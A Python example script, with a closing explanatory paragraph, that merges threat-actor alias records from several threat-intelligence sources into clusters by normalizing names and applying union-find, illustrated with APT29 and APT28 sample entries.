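"""Merge threat-actor alias records from several CTI sources into one cluster.

Added example; not code from the ORKL archive. SAMPLE is a constructed subset
shaped like the record's "threat_actors" entries (trailing spaces and casing
differences kept on purpose to mirror the real data).
"""
import re
from collections import defaultdict

# Constructed sample: four entries with the same fields as the record's entries.
SAMPLE = [
    {"main_name": "UNC2452", "source_name": "ETDA:UNC2452",
     "aliases": ["Dark Halo", "Nobelium", "SolarStorm", "UNC2452"]},
    {"main_name": "IRON HEMLOCK", "source_name": "Secureworks:IRON HEMLOCK",
     "aliases": ["APT29 ", "Cozy Bear ", "The Dukes", "UNC2452 "]},
    {"main_name": "APT 29", "source_name": "ETDA:APT 29",
     "aliases": ["APT 29", "Cozy Bear", "Iron Hemlock", "NOBELIUM"]},
    {"main_name": "APT28", "source_name": "MITRE:APT28",
     "aliases": ["APT28", "Fancy Bear", "Sofacy"]},
]


def normalize(name):
    """Canonical key: strip, casefold, drop everything but letters and digits,
    so 'APT 29', 'APT29 ' and 'apt29' all collide on 'apt29'."""
    return re.sub(r"[^a-z0-9]", "", name.strip().casefold())


class DisjointSet:
    """Minimal union-find over record indices."""

    def __init__(self, n):
        self.parent = list(range(n))

    def find(self, i):
        while self.parent[i] != i:
            self.parent[i] = self.parent[self.parent[i]]  # path halving
            i = self.parent[i]
        return i

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_actors(records):
    """Group records that share any normalized name (main_name or alias).

    Returns a list of clusters. Each cluster holds `names`, mapping a
    normalized key to the set of raw spellings seen for it, and `sources`,
    the source_name values that contributed to the cluster.
    """
    ds = DisjointSet(len(records))
    owner = {}  # normalized key -> first record index that used it
    for i, rec in enumerate(records):
        for raw in [rec["main_name"], *rec["aliases"]]:
            key = normalize(raw)
            if not key:
                continue
            if key in owner:
                ds.union(owner[key], i)
            else:
                owner[key] = i

    groups = defaultdict(lambda: {"names": defaultdict(set), "sources": set()})
    for i, rec in enumerate(records):
        g = groups[ds.find(i)]
        g["sources"].add(rec["source_name"])
        for raw in [rec["main_name"], *rec["aliases"]]:
            key = normalize(raw)
            if key:
                g["names"][key].add(raw.strip())
    return list(groups.values())


def cluster_for(records, name):
    """Return the cluster whose names include `name` (any spelling), else None."""
    key = normalize(name)
    for g in cluster_actors(records):
        if key in g["names"]:
            return g
    return None


if __name__ == "__main__":
    g = cluster_for(SAMPLE, "apt29")
    print("sources:", sorted(g["sources"]))
    for key, spellings in sorted(g["names"].items()):
        print(f"{key:12s} <- {sorted(spellings)}")
```

Run against the full record, the same routine folds all the APT29-family entries (ETDA, MITRE, Secureworks IRON HEMLOCK and IRON RITUAL, both MISP Galaxy entries) into a single cluster while leaving unrelated actors apart. The strip-and-casefold key is deliberately aggressive; if a feed uses names that differ only in punctuation for genuinely different actors, tighten `normalize` before trusting the merge.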